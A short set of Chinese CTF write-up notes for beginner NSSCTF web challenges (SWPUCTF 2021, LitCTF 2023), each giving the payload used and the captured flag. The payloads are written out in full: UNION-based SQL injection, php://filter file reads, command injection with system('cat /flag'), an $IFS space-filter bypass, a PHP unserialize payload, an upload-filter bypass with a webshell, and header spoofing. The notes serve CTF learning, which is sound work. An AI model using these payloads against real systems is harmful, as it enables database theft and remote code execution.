NSSCTF Web 第一页
[SWPUCTF 2021 新生赛]gift_F12

点击确定

查看源码

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}
[SWPUCTF 2021 新生赛]jicao

get:json={"x":"wllm"} post:id=wllmNB

NSSCTF{47e0e900-250c-40d2-8ccf-2fef864d242a}
[SWPUCTF 2021 新生赛]easy_md5

md5弱比较绕过:314282422、571579406

NSSCTF{9668d690-7b6d-42a0-8c20-205dd6b5dc7f}
[SWPUCTF 2021 新生赛]include

/?file=flag.php

伪协议读源码:php://filter/read=convert.base64-encode/resource=flag.php

b64解密得:
<?php
$flag='NSSCTF{d44702c1-094b-489a-a0ab-50471944f73d}';
[SWPUCTF 2021 新生赛]easy_sql

字符型单引号。判断列数:/?wllm=-1' order by 4--+

/?wllm=-1' order by 3--+

共3列
查看回显位:/?wllm=-1' union select 1,2,3--+

回显位 2,3
查库:/?wllm=-1' union select 1,2,database()--+

库 test_db
查表:/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"--+

表 test_tb,users
查test_tb表的所有字段:/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="test_db" and table_name="test_tb"--+

所有字段 id,flag
查看flag字段的内容:/?wllm=-1' union select 1,2,flag from test_tb--+

NSSCTF{e2e3e44f-3751-4545-b48f-4c41818fa887}
[LitCTF 2023]我Flag呢?

查看源码

NSSCTF{cd21a6ec-88cb-46cd-b40f-1d0baa9b785f}
[SWPUCTF 2021 新生赛]easyrce

/?url=echo(system("ls /"));

/?url=echo(system("cat /flllllaaaaaaggggggg"));

NSSCTF{80867aa5-b8f8-4ebb-bbe8-d38fb3b5206f}
[SWPUCTF 2021 新生赛]caidao

wllm=system("cat /flag");

NSSCTF{c30de7d3-4048-4037-8bf6-265e61bdc95a}
[SWPUCTF 2021 新生赛]Do_you_know_http

bp抓包,将UA内容改为:WLLM

要求本地,X-Forwarded-For: 127.0.0.1

NSSCTF{6207b742-51ff-42e3-a012-aede36925162}
[SWPUCTF 2021 新生赛]babyrce

按要求传值

访问rasalghul.php

只过滤了空格,用$IFS$1绕过:/rasalghul.php?url=cat$IFS$1/flllllaaaaaaggggggg
NSSCTF{571f2fa9-f820-4245-9f42-c08d6061d016}
[第五空间 2021]WebFTP

标题中提示了git泄露

用工具下载泄漏文件:python githack.py http://node7.anna.nssctf.cn:26492/.git/

打开下载完的文件夹,发现是空的。目录扫描:

访问phpinfo.php

NSSCTF{d7c12238-0701-467f-9ca8-d0a4971e903f}
[SWPUCTF 2021 新生赛]ez_unserialize

查看源码

访问robots.txt

访问cl45s.php

poc:
<?php class wllm{ public $admin="admin"; public $passwd="ctf"; } echo serialize(new wllm());
payload:/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

NSSCTF{01336073-5e78-4911-a3ee-f7dcbf4846d3}
[SWPUCTF 2021 新生赛]easyupload2.0

只过滤了php后缀,用phtml代替即可。上传小马后,进行命令执行:cmd=system("env");

NSSCTF{cff7743d-5e0e-47f5-a56f-f28896e96f7b}
[LitCTF 2023]导弹迷踪

前端源码中没有信息,查看网络:


在game.js中发现flag:NSSCTF{y0u_w1n_th1s_!!!}
[LitCTF 2023]PHP是世界上最好的语言!!

输入php代码并执行

<?php system("cat /flag");?>

NSSCTF{cb2166a8-18d3-4c03-83eb-1fbe47d1b2b7}